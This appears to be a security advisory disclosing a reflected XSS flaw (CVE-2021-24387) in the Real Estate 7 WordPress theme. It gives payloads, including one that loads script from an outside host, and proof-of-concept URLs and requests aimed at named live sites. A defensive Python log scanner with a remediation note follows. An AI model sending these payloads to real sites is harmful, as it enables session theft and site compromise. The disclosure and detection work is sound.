[+] :: VULNERABILITY: Real Estate 7 WordPress Theme < 3.1.1 - Unauthenticated Reflected XSS
[+] :: GOOGLE DORK: inurl:/wp-content/themes/realestate-7/
[+] :: DATE: 2021-05-25
[+] :: SECURITY RESEARCHER: Visse [ https://visse.ru ]
[+] :: VENDOR: Contempo Themes [ https://www.contempothemes.com ]
[+] :: SOFTWARE VERSION: < 3.1.1
[+] :: SOFTWARE LINK: https://themeforest.net/item/wp-pro-real-estate-7-responsive-real-estate-wordpress-theme/12473778
[+] :: CVSS: 3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
[+] :: CWE: CWE-79
[+] :: CVE: CVE-2021-24387



[i] == [ Info: ]

An Unauthenticated Reflected XSS vulnerability was discovered in the Real Estate 7 theme through v3.1.1 for WordPress.

Vulnerable parameter(s): &ct_community=.



[$] == [ Impact: ]

Injection of malicious JavaScript code, plus the ability to combine it with other attack vectors against the targeted system, which can lead to a complete compromise of the resource.



[%] == [ Payloads: ]

<script src=//m0ze.ru/payload/a.js></script>

<script>alert(document.domain);</script>



[!] == [ PoC #1 | Unauthenticated Reflected XSS | &ct_community: ]

https://elementor3.contempothemes.com/?ct_mobile_keyword&ct_keyword&ct_city&ct_zipcode&search-listings=true&ct_price_from&ct_price_to&ct_beds_plus&ct_baths_plus&ct_sqft_from&ct_sqft_to&ct_lotsize_from&ct_lotsize_to&ct_year_from&ct_year_to&ct_community=%3Cscript%20src=//m0ze.ru/payload/a.js%3E%3C/script%3E&ct_mls=&ct_brokerage=0&lat&lng

GET /?ct_mobile_keyword&ct_keyword&ct_city&ct_zipcode&search-listings=true&ct_price_from&ct_price_to&ct_beds_plus&ct_baths_plus&ct_sqft_from&ct_sqft_to&ct_lotsize_from&ct_lotsize_to&ct_year_from&ct_year_to&ct_community=%3Cscript%20src=//m0ze.ru/payload/a.js%3E%3C/script%3E&ct_mls=&ct_brokerage=0&lat&lng HTTP/2
Host: elementor3.contempothemes.com



[!] == [ PoC #2 | Unauthenticated Reflected XSS | &ct_community: ]

https://misionloreto.com/?ct_mobile_keyword&ct_keyword&ct_city&ct_zipcode&search-listings=true&ct_price_from&ct_price_to&ct_beds_plus&ct_baths_plus&ct_sqft_from&ct_sqft_to&ct_lotsize_from&ct_lotsize_to&ct_year_from&ct_year_to&ct_community=%3Cscript%3Ealert(document.domain);%3C/script%3E&ct_mls=&ct_brokerage=0&lat&lng

GET /?ct_mobile_keyword&ct_keyword&ct_city&ct_zipcode&search-listings=true&ct_price_from&ct_price_to&ct_beds_plus&ct_baths_plus&ct_sqft_from&ct_sqft_to&ct_lotsize_from&ct_lotsize_to&ct_year_from&ct_year_to&ct_community=%3Cscript%3Ealert(document.domain);%3C/script%3E&ct_mls=&ct_brokerage=0&lat&lng HTTP/2
Host: misionloreto.com
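As an added example (not part of this advisory and not the theme's own code), the following Python script scans web-server access-log lines for requests that carry HTML/script markup in the ct_community parameter, the pattern shown in the PoC requests above. The log lines, timestamps and IP addresses are constructed for the example; the two probe requests mirror PoC #1 and #2 and a double-encoded variant is included to show why the value is decoded repeatedly.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample lines in Apache/Nginx "combined" format (not real traffic).
# Lines 1-2 mirror the advisory's PoC #1/#2, line 3 is a benign search,
# line 4 is a double-encoded probe.
SAMPLE_LOG = """\
203.0.113.10 - - [25/May/2021:10:01:02 +0000] "GET /?search-listings=true&ct_community=%3Cscript%20src=//m0ze.ru/payload/a.js%3E%3C/script%3E&ct_mls= HTTP/2.0" 200 5120 "-" "Mozilla/5.0"
203.0.113.11 - - [25/May/2021:10:02:03 +0000] "GET /?search-listings=true&ct_community=%3Cscript%3Ealert(document.domain);%3C/script%3E HTTP/2.0" 200 5120 "-" "Mozilla/5.0"
203.0.113.12 - - [25/May/2021:10:03:04 +0000] "GET /?search-listings=true&ct_community=Downtown HTTP/2.0" 200 5120 "-" "Mozilla/5.0"
203.0.113.13 - - [25/May/2021:10:04:05 +0000] "GET /?search-listings=true&ct_community=%253Cscript%253E HTTP/2.0" 200 5120 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Markup that should never appear in a free-text community name.
MARKUP_RE = re.compile(r"<\s*/?\s*script|<[a-z!/]|javascript:|\bon\w+\s*=", re.IGNORECASE)
# Parameters known to be reflected unescaped; extend if more are found.
WATCHED_PARAMS = ("ct_community",)

def fully_decode(value: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly so double-encoded probes are also caught."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_line(line: str):
    """Return (ip, param, decoded_value) if the line carries markup in a watched param, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # parse_qs percent-decodes once; keep_blank_values keeps empty params such as ct_mls=
    query = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
    for param in WATCHED_PARAMS:
        for raw in query.get(param, []):
            value = fully_decode(raw)
            if MARKUP_RE.search(value):
                return (m["ip"], param, value)
    return None

def scan_log(text: str):
    """Run inspect_line over every line and return the list of hits."""
    return [hit for hit in (inspect_line(l) for l in text.splitlines()) if hit]

if __name__ == "__main__":
    for ip, param, value in scan_log(SAMPLE_LOG):
        print(f"{ip} reflected-XSS probe in {param}: {value!r}")
```

The same check, applied server-side before the parameter is echoed back, is the detection half of the fix; the other half is escaping the value with the WordPress escaping functions at the point where it is output.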



[@] == [ Contacts: ]

Website: visse.ru
Medium: @visse